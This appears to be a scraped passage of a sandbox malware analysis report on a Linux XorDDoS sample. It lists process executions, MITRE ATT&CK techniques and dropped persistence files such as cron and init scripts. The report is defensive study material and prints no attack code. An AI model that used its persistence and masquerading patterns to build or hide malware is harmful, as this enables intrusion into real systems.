Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:18
Start date:	21/09/2022
Path:	/usr/bin/cuofybetod
Arguments:	/usr/bin/cuofybetod whoami 6236
File size:	625740 bytes
MD5 hash:	554dddb463d9700eaaf0c0bcd370d82f

Start time:	23:41:18
Start date:	21/09/2022
Path:	/usr/bin/cuofybetod
Arguments:	n/a
File size:	625740 bytes
MD5 hash:	554dddb463d9700eaaf0c0bcd370d82f

Start time:	23:41:18
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:18
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:18
Start date:	21/09/2022
Path:	/usr/bin/cuofybetod
Arguments:	/usr/bin/cuofybetod "ps -ef" 6236
File size:	625740 bytes
MD5 hash:	554dddb463d9700eaaf0c0bcd370d82f

Start time:	23:41:18
Start date:	21/09/2022
Path:	/usr/bin/cuofybetod
Arguments:	n/a
File size:	625740 bytes
MD5 hash:	554dddb463d9700eaaf0c0bcd370d82f

Start time:	23:41:23
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:23
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:23
Start date:	21/09/2022
Path:	/usr/bin/jmphmmthfs
Arguments:	/usr/bin/jmphmmthfs whoami 6236
File size:	625729 bytes
MD5 hash:	940ae105b702a386949e8114f1f38621

Start time:	23:41:23
Start date:	21/09/2022
Path:	/usr/bin/jmphmmthfs
Arguments:	n/a
File size:	625729 bytes
MD5 hash:	940ae105b702a386949e8114f1f38621

Start time:	23:41:23
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:23
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:23
Start date:	21/09/2022
Path:	/usr/bin/jmphmmthfs
Arguments:	/usr/bin/jmphmmthfs whoami 6236
File size:	625729 bytes
MD5 hash:	940ae105b702a386949e8114f1f38621

Start time:	23:41:23
Start date:	21/09/2022
Path:	/usr/bin/jmphmmthfs
Arguments:	n/a
File size:	625729 bytes
MD5 hash:	940ae105b702a386949e8114f1f38621

Start time:	23:41:23
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:23
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:23
Start date:	21/09/2022
Path:	/usr/bin/jmphmmthfs
Arguments:	/usr/bin/jmphmmthfs sh 6236
File size:	625729 bytes
MD5 hash:	940ae105b702a386949e8114f1f38621

Start time:	23:41:23
Start date:	21/09/2022
Path:	/usr/bin/jmphmmthfs
Arguments:	n/a
File size:	625729 bytes
MD5 hash:	940ae105b702a386949e8114f1f38621

Start time:	23:41:23
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:23
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:23
Start date:	21/09/2022
Path:	/usr/bin/jmphmmthfs
Arguments:	/usr/bin/jmphmmthfs uptime 6236
File size:	625729 bytes
MD5 hash:	940ae105b702a386949e8114f1f38621

Start time:	23:41:23
Start date:	21/09/2022
Path:	/usr/bin/jmphmmthfs
Arguments:	n/a
File size:	625729 bytes
MD5 hash:	940ae105b702a386949e8114f1f38621

Start time:	23:41:23
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:23
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:23
Start date:	21/09/2022
Path:	/usr/bin/jmphmmthfs
Arguments:	/usr/bin/jmphmmthfs ls 6236
File size:	625729 bytes
MD5 hash:	940ae105b702a386949e8114f1f38621

Start time:	23:41:24
Start date:	21/09/2022
Path:	/usr/bin/jmphmmthfs
Arguments:	n/a
File size:	625729 bytes
MD5 hash:	940ae105b702a386949e8114f1f38621

Start time:	23:39:22
Start date:	21/09/2022
Path:	/usr/lib/systemd/systemd
Arguments:	n/a
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time:	23:39:22
Start date:	21/09/2022
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the at utility to perform task scheduling for initial or recurring execution of malicious code. The at command within Linux operating systems enables administrators to schedule tasks.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report fuck.elf

Overview

General Information

Detection

Signatures

Classification

Analysis Advice

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Snort Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Networking

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Threatname: XorDDoS

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/etc/cron.hourly/gcc.sh

/etc/crontab

/etc/init.d/fuck.elf

/memfd:snapd-env-generator (deleted)

/run/gcc.pid

/usr/bin/axppigwavk

/usr/bin/ggsxjmacxa

/usr/bin/hwcijqdbza

/usr/bin/jflhtagbsg

/usr/bin/oklqvchkds

/usr/bin/pzvxnaaphf

/usr/bin/sanzuhhixf

/usr/bin/ujuhiugmmi

/usr/bin/wjnxqdxblo

/usr/bin/xocmdvejxu

/usr/bin/xodlvzjoas

/usr/bin/zfyjfaoiow

/usr/bin/zkleyiegjf

/usr/lib/libudev.so

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Linux Analysis Report
fuck.elf